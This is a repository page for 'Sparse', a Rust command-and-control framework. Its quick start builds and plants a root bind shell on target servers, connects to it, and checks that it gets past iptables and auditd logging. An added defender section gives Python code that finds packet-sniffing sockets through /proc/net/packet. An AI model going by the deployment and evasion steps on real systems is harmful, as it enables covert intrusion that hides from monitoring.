Andrew Rioux 7f209d95ce
feat: add action to build and upload sparse
2025-10-21 09:57:30 -04:00

Sparse: A Rust C2 framework

Sparse is built on libpcap so that it can evade local firewalls, with an eye towards hiding itself from inspection. It was deprecated in favor of sparse-v2 before being completely developed; the most significant tool this repository contributes is sparse-05.

This repository weaponizes some of the concepts highlighted in this blog post

Significant Packages

  • pcap-sys: A Rust wrapper around the libpcap library for Linux
  • nl-sys: A Rust wrapper around the netlink (nl) library on Linux
  • sparse-05: A bind shell utility to create bind shells on target servers and connect to them

Development

This project is designed to be developed inside a Nix developer shell, obtained with nix develop.

Bind shell

The most mature implementation of Sparse is the version 0.5 bind shell (sparse-05), which is documented in its own folder.

Quick start:

  • Install the Nix package manager on a Linux system: https://nixos.org/download/
  • Run nix --experimental-features 'nix-command flakes' build .#sparse-05-client
  • Generate a Linux server with result/bin/sparse-05-client generate -t linux service-name
  • Copy to and run on a target system as root
  • Connect to it with result/bin/sparse-05-client connect service-name.scon SERVER_IP:54248
  • Set up a firewall to block all inbound connections with iptables -P INPUT DROP, iptables -F INPUT; sparse should still be able to connect and operate
  • Run iptstate, auditbeat, or auditd from another session to see that no IP or UDP traffic is being logged by the kernel
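
For defenders: libpcap on Linux reads frames through an AF_PACKET socket, which sees inbound traffic before iptables and never shows up as a listening port, but the kernel does list every such socket in /proc/net/packet. The following is an added example, not code from this repository, that parses that file and maps each ETH_P_ALL socket to its owning process; the sample rows, inode numbers and the proc_root parameter are constructed for illustration.

```python
import os

# Constructed sample in the /proc/net/packet layout (not captured from a real host).
SAMPLE = """\
sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9c6d41a3b000 3      3    0003   2     1 0      0      48211
ffff9c6d41a3c800 3      2    888e   3     1 0      0      19077
"""

ETH_P_ALL = 0x0003  # socket receives every frame on the interface


def parse_packet_sockets(text):
    """Parse /proc/net/packet text into a list of dicts, one per AF_PACKET socket."""
    socks = []
    for line in text.splitlines()[1:]:  # skip the header row
        f = line.split()
        if len(f) < 9:
            continue
        socks.append({"type": int(f[2]), "proto": int(f[3], 16),
                      "ifindex": int(f[4]), "uid": int(f[7]), "inode": int(f[8])})
    return socks


def sniffing_sockets(text):
    """Sockets bound to ETH_P_ALL: these see inbound frames regardless of iptables."""
    return [s for s in parse_packet_sockets(text) if s["proto"] == ETH_P_ALL]


def socket_owners(inodes, proc_root="/proc"):
    """Map socket inode -> sorted [(pid, comm)] by walking <proc_root>/<pid>/fd links."""
    wanted = {f"socket:[{i}]": i for i in inodes}
    owners = {i: set() for i in inodes}
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        base = os.path.join(proc_root, pid)
        try:
            with open(os.path.join(base, "comm")) as fh:
                comm = fh.read().strip()
            for fd in os.listdir(os.path.join(base, "fd")):
                if (target := os.readlink(os.path.join(base, "fd", fd))) in wanted:
                    owners[wanted[target]].add((int(pid), comm))
        except OSError:  # process exited or its fds are unreadable; skip it
            continue
    return {i: sorted(v) for i, v in owners.items()}


if __name__ == "__main__":  # run as root so every process's fd table is readable
    with open("/proc/net/packet") as fh:
        hits = sniffing_sockets(fh.read())
    found = socket_owners([s["inode"] for s in hits])
    for s in hits:
        print(s["inode"], s["ifindex"], found[s["inode"]] or "owner not visible")
```

Legitimate software such as DHCP clients and packet capture tools also holds AF_PACKET sockets, so compare the owners against what is expected to run on the host.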
Readme AGPL-3.0 437 KiB
Languages
Rust 96.8%
Nix 2.5%
Python 0.4%
C 0.3%